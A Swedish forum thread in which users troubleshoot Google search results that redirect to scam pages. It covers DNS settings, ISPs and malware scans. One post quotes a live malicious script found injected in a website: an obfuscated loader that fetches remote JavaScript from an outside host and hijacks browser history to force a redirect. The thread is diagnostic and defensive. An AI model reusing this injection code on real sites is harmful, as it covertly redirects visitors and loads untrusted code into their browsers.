Försöker förstå hur detta gick till (redirect/scam)

Låter helt klart som suspekt otyg som påverkar DNS. Möjligen via IPS som talare ovan föreslår (mycket ovanligt), via router (ganska ovanligt) eller via datorn (vanligt). Har du provat att även skanna med t.ex. Malwarebytes och adware removal tool? Jag skulle börja i den änden och se om det ger något napp

Gör jag en sökning på Skånehobby på Google (med Chrome) och tar första alternativet som kommer upp i resultaten kommer jag till samma scam-adress. Har enligt Malwarebytes en virusfri dator. Min ISP är Telia.

Testade jag också med Googles DNSer och då fungerar länkningen som det ska!

Spännande jag fick också upp en Iphone-scam-sida.

Jag har Bahnhof som operatör men DNS från OpenDNS tydligen (tror det är en gammal inställning som var konfigurerad i routern från när jag hade Telia tidigare) - den kanske inte är pålitlig längre?

Jag har också fått upp det där med en undersökning från ens internetleverantör några gånger först för typ ett år sedan och senast kanske för några månader sedan. Första gången sökte jag igenom datorn med några olika verktyg utan att hitta något och sen sket jag bara i det och stängde fönstret. Har Bahnhof.

Angående googles redirect så är det standard för google och det är väl så de håller reda på vilka länkar som klickas på och så.

När jag klickade på TS länk fick jag en iphone-tävling första gången och försökte jag igen kom jag till skånehobby.

Jag har Alltele och har också nyligen fått upp något i stil med "Här kan du delta i en kundundersökning från Alltele och få 500 kr", detta i ett relativt osuspekt surfsammanhang.

Har även blivit omdirigerad till något iphone-tävlingsliknande från vanliga google-resultat som bara pekar på en domän (alltså i stil med "http://www.*******.se")

Detta skedde bara en gång (iaf per sida), när jag försökte återskapa problemet kom jag gång på gång in på rätt sida som vanligt.

Första gången såg jag att URL:en innehöll något i stil med "http://rage1197.download*************************"-någonting. Googlar man på det får man fram sådana där luriga "så här tar du bort rage1197-virus, ladda hem det här remove-programmet" etc. Så eventuellt rör det sig om något halvkänt iaf?

Har ingen speciell DNS konfigurerad i datorn och routern får DNS från ISP (Alltele). Möjligtvis att ena datorn använder 8.8.8.8

Kan vara så att någon lyckats skjuta in skadlig kod på deras hemsida, dvs att man blir vidarebefordrad till en annan sida. Beroende på hur dom har valt att det ska fungera, så kan det vara slumpat. För att inte dra till sig för mycket uppmärksamhet.

Nu hade dom ingen reklam från 3:e part, men det brukar vara en säker källa för fuffens annars. Det var poppis på facebook ett tag, att smyga med kod inuti bilder.

I mitt fall kan du nog ha rätt, kollar man i källan på en av sidorna jag besökt så ser man detta efter body-taggen:

<script type="text/javascript">
var a=document.cookie.match("(^|;) ?fcked=([^;]*)(;|$)");if(1!=(a?unescape(a[2]):null)){var b=new Date;
b.setTime(b.getTime()+864E5);document.cookie="fcked=1; 
expires="+b.toGMTString()+"; path=/";
var c=document.createElement("script");
c.async=!0;c.src="htt"+"p://pp"+"c.n"+"et"+"ne"+"t4"+"4.n"+"et"+":1"+"08"+"0/"+Math.floor(9999*Math.random())+".js?"+Math.floor(99*Math.random());

(document.getElementsByTagName("body")[0]||document.getElementsByTagName("head")[0]).appendChild(c)};

(function(){var a;try{for(a=0;10>a;++a)history.pushState({},"","");
onpopstate=function(a){a.state&&location.replace("ht"+"tp://p"+"pc.ne"+"tnet4"+"4.ne"+"t:1"+"08"+"0/50"+"8.html")}}catch(b){}})();</script>

(har försökt radbryta lite för att öka tydligheten)

Nu är jag ingen javascript-expert, men att dela upp en URL enligt "htt"+"p://pp"+"c.n"+"et" etc ser ju ut som ett uppenbart försök att dölja något. Dessutom är ju location.replace() hyfsat misstänkt

Det vore ju skönt om det "bara" berodde sidan och inte något skräp på datorn, vilket de där redirectsen säkert kan få till i förlängningen :S

Lite klurigt att lista ut varifrån det kommer (lokalt eller på extern på servern). Men får du upp samma sida om du besöker andra sidor, så kan det vara nånting i datorn som skjuter in kod. Kanske ett add-in till webbläsaren. Fanns nått plugin till Chrome som blev uppköpt och dom nya ägarna gjorde det dom var bäst på. Det vill säga att sänka den grunden med en massa malware och kod som blev påklistrat på sidor.

Det var ett par år sedan visserligen. Men inget säger att det kan hända igen. Kommer inte tusan ihåg vilket plugin det var, men kan ha varit nån variant utav AdBlocker.

Men i detta fall, så tror jag mer på att webbservern är drabbad. Har du antivirus och kanske malwarebytes på datorn så skadar det inte att köra en fullständig sökning. Better safe than sorry!